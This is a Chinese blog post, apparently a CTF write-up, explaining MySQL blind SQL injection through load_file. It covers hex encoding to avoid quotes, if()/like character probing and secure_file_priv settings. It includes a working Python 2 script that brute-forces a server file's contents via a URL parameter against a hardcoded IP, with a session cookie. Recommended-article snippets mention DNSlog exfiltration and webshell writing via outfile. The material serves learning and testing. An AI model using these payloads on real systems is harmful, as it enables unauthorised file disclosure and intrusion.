mysql 盲注 if_load_file进行mysql盲注+mysql的一些tip

最新推荐文章于 2023-01-07 18:45:01 发布
最新推荐文章于 2023-01-07 18:45:01 发布
阅读量271 收藏
点赞数
文章标签: mysql 盲注 if
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31668621/article/details/113597390
版权

1、前言

今天看了一道安恒杯的ctf题,里面load_file盲注的思路看起来有点意思,该思路没有用单引号,使用到sql查询文件内容。

1.mysqld启动

1.在利用mysql进行sql注入的测试中,遇到一些mysql启动上的问题,可以在mysql的启动或控制台日志查看

输入命令

mysqld --console

966f6eccd56b6a6ba33fdaf58327f824.png

2.其次是有时候不存在端口占用又无法启动mysqld的情况,需要进入services中将mysqla停掉,

做个记录,原因尚未探寻,如图,停掉箭头所指的mysqla

49c4131ee6024e873d5e2e8673010ae2.png

2、load_file开启

当前使用的是mysql5.7版本,需要进入my.ini中增加一行

0ad9a309e4b209e1c7c81c8947221a4e.png

默认开启所有目录尚未调试过,参考文章的链接如下

https://www.cnblogs.com/hackxf/p/8975501.html

针对其中提到一些重点进行记录,防止链接失效

secure_file_priv选项

secure_file_priv

1、限制mysqld 不允许导入 | 导出

--secure_file_prive=null

2、限制mysqld 的导入 | 导出 只能发生在/tmp/目录下

--secure_file_priv=/tmp/

3、不对mysqld 的导入 | 导出做限制

--secure_file_priv=

linux

cat /etc/my.cnf

[mysqld]

secure_file_priv=

win

my.ini

[mysqld]

secure_file_priv=

查看secure_file_priv

show global variables like '%secure%';

3、mysql的load_file盲注

1.思路

当我们遇到不能使用select的情况下,可以使用load_file读取文件查询文件内容,当然,这个使用的条件自然是很苛刻的,正常来说高版本的secure_file_priv不会开启。

1)读取文件demo

select load_file('c:\sql.txt');

2)利用hex编码就可以减少或者不使用单引号

select hex(load_file(0x633a5c73716c2e747874))

3)利用if+like进行文件内容探测

首先使用if表达式来进行回显判断,比如

if(exp,1,0)

exp指代前面的表达式

然后使用like进行字符判断,比如like 'a%'就可以判断以a字符开头的字符内容是否存在。

if(exp,1,0)like(0x*25)

*这里指任意值

那么我们只要使用like去判断是否存在某字符开头,存在则加上这一次的字符进行下一次判断,直到符合的字符串出现。这样循环后,就可以得到最终的文件内容。问题是

停止条件是什么?可以这样想,我们使用所有的可见字符去爆破一个字母,当可见字符用完后,依旧没有得到结果,说明不存在这样的字符串,此时可以将它当做条件结束。

demo:

字符串abcde

判断abcde中是否存在a开头的字符,存在则结束本次判断,不存在则利用下一个可见字符判断,直到用完为止

存在a开头字符串,那么接下来判断aa是否存在,判断条件同上。

结束条件为所有可见字符用完为止

2.实现exp

python2

#coding:utf-8

import requests

import string

payload=string.printable

payload=list(payload)

file =""

db = ""

while True:

n = 1

end = len(payload)

#print end

for i in payload:

req = requests.session()

header = {

"Cookie":"__guid=206886163.707362614897664800.1543048794439.3918;PHPSESSID=4e6p8mktq1b5p84jnndsvqv166"

}

exp= "if(hex(load_file(0x2f7661722f7777772f68746d6c2f696e6465782e706870))like(0x{temp}25),1,2)"

url = "http://101.71.29.5:10015/user/user.php?id="+exp

i = i.encode("hex")

url = url.format(temp=db+i)

res = req.get(url=url,headers=header)

#print res.status_code

if "user_id:1" in res.text:

print url

db = db + i

file = file + i.decode("hex")

print file

break

n = n + 1

if n == end:

print db

exit(0)

来源https://www.shuzhiduo.com/A/KE5Qvje0dL/

珞珈小山
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Mysql注入中的outfile、dumpfileload_file函数详解
09-09
主要介绍了Mysql注入中的outfile、dumpfileload_file,需要的朋友可以参考下
dnslog盲注原理
qq_50854662的博客
01-21 244
Dnslog盲注原理 布尔盲注和时间盲注相当于猜单词的游戏,我们需要对每一位逐步的猜测,效率很低,需要发送很多的请求进行判断,很可能会触发安全设备的防护 我们需要一种方式能够减少请求,直接回显数据——Dnslog注入 Dns在解析的时候会留下日志,通过读取多级域名的解析日志,获取请求信息 Dnslog盲注方法 登录http://ceye.io/网站并注册,得到属于自己的identifier 先尝试在终端运行curl dnslog.4ke30o.ceye.io Mysql load_file()函
mysql load file_MySQL使用LOAD_FILE()函数方法总结
weixin_35141284的博客
01-27 6299
mysql中,load_file()函数读取一个文件并将其内容作为字符串返回。语法load_file(file_name)其中file_name是文件的完整路径。下面是我从一个文件中选择内容的示例:select load_file('/data/test.txt') as result;结果:+------------------------------------------+| result...
mysql load file 函数_MySQL使用LOAD_FILE()函数方法总结
weixin_39671374的博客
01-21 2065
mysql中,load_file()函数读取一个文件并将其内容作为字符串返回。语法load_file(file_name)其中file_name是文件的完整路径。下面是我从一个文件中选择内容的示例:select load_file('/data/test.txt') as result;结果:+------------------------------------------+| result...
ctf线下赛mysql密码_某CTF线下赛某CMS SQL注入分析
weixin_36046580的博客
01-21 273
前段时间,参加一次CTF线下攻防赛,用的是某cms,里面有一个SQL注入漏洞,挺有意思,记录一下分析心得。系统后台登陆处存在SQL注入,在后台登陆用户名处加个’测试一下:发现报错,十有八九存在SQL注入看下/admin/login.php内容:在42和43行发现对user和password进过fl_value()和fl_html()处理,然后送入check_login(),跟进check_logi...
解决MySQL导入导出时报错
Noxi_lumors的博客
01-07 1417
解决MySQL导入导出时报错: ERROR 1290 (HY000), The MySQL server is running with the –secure-file-priv option so it cannot execute this statement 首先 查看secure-file-priv show variables like ‘%secure%’ 这里显
JSP-mysql.zip_JSP+Mysql_jsp mysql
09-20
JSP如何连接mysql,从软件安装到代码实例,很全
MySQL-JAVA.rar_java mysql_java+mysql_mysql_java
09-22
這是 Java 連接 MySQL 的範例程式
php-mysql.rar_PHP 数据库_php+mysql
09-22
php-mysql论坛,整套,包含数据库数据等,模块化的编程方式方便管理
MySQL使用LOAD_FILE()函数方法总结
09-09
在本篇文章里小编给大家分享了关于MySQL使用LOAD_FILE()函数方法和相关知识点,需要的朋友们学习下。
CTF web小总结
A_dmin的博客
07-15 3477
PHP绕过技巧、SQL技巧、命令执行绕过小技巧、反序列化、文件上传绕过
CTF学习笔记3:mysql读文件与写文件
lifeng_dc的博客
01-22 769
目录一、前提条件(一)查看导入导出权限配置(二)查看当前用户(三)查看当前用户的文件读写权限(四)为实验修改配置重启服务(五)检查配置效果二、读写文件测试(一)生成测试文件(二)读取文件(三)写入文件(四)检查写入效果 一、前提条件 1.对web目录具有读写权限 2.知道文件绝对路径 3.能够使用联合查询 (一)查看导入导出权限配置 mysql> show variables like "secure_file_priv"; +------------------+-------+ | Variabl
mysql注入之盲注语句汇总
sirius的博客
08-28 3364
目录 mysql注入之盲注 常用语句汇总 基于bool盲注 查询当前数据库 基于时间的盲注 盲注常用函数: regexp正则注入 like匹配注入 特殊的盲注之报错注入 mysql注入之盲注 什么是盲注? 基于布尔型SQL盲注即在SQL注入过程中,应用程序仅仅返回True(页面)和False(页面)。 盲注就是利用真假条件进行测试。 这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。 常用语句汇总 基.
查询数据库中所有列名
xianrenyingzi的专栏
12-14 4647
如何从整个数据库所有表中查找出一个列名?比如想要查找一个名为"name"的列名,但是忘记了这一列是在那一个表中,需要从整个数据库的所有表中进行查询。 Oracle 数据库: select * from user_col_comments s where s.column_name like 'NAME%'; MySQL数据库: SELECT * FROM information_schema.COLUMNS WHERE column_name like 'NAME%'; SqlServer数据库:
BUUCTF: [网鼎杯 2020 朱雀组]Nmap
末初的CSDN博客
09-21 1949
是可以执行的,可以先上线一个shell,然后在服务器中检查使用其他参数的结果。会将执行语句记录输出文件。控制输出文件内容以及文件格式就可以解析了。的文件无法写入,尝试写入一些可能会解析的其他文件后缀。使用输出格式可以将指定的内容输出到指定的文件格式。对传入的参数的保护(感觉有点点猜的意思。但是这里还有些过滤,比如过滤了关键字。会把扫描结果导出到一个文件里面。题目环境经过测试可以发现只有。,那说明导出的文件格式是。即便执行失败也无所谓,
mysql 漏洞 load_file_MySQL注入中的outfile、dumpfileload_file函数详解
weixin_28973649的博客
01-19 360
在利用sql注入漏洞后期,最常用的就是通过mysqlfile系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个into dumpfile()into outfile()load_file()读写文件函数调用的限制因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数 secure_file_priv 的影响。官方文档中的描述如下:翻译一下就是其中当参数 se...
mysql注入ctf_CTF比赛中SQL注入的一些经验总结
weixin_32334681的博客
01-20 670
*本文原创作者:pupiles,本文属FreeBuf原创奖励计划,未经许可禁止转载ctf中sql注入下的一些小技巧最近花了一点时间总结了各大平台中注入的trick,自己还是太菜了,多半都得看题解,就特此做了一个paper方便总结注释符以下是Mysql中可以用到的单行注释符:#-- -;%00以下是Mysql中可以用到的多行注释符(mysql下需要闭合):/*`判断当前库是否有字段名对于CTF中的题...
《从0到1:CTFer成长之路》1.3 任意文件读取漏洞
ZhShy
01-12 4703
文章目录1.3.1 文件读取漏洞常见触发点1.3.1.1 web语言1. PHP2.python3.Java4.Ruby5.Node1.3.1.2 中间件、服务件相关1.Nginx错误配置2.数据库3.软链接4.FFmpeg5.Docker-API1.3.1.3 客户端相关1.浏览器/Flash XSS2.MarkDown语法解析器XSS1.3.2 文件读取漏洞常见读取路径1.3.2.1 Linux1.flag名称(相对路径)2.服务器信息(绝对路径)1.3.2.2 Windows 1.3.1 文件读取漏洞
小白的CTF之路之DNSlog注入
glass_york的博客
01-07 983
dnslog注入,sqlilabs第九关
mysql load_file函数
最新发布
04-26
MySQL中的load_file函数用于将指定文件中的内容读取到一个字符串中。这个函数的语法如下: load_file(file_name) 其中,file_name是指定要读取的文件名。该函数会返回读取的文件内容,如果文件不存在或者没有权限...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值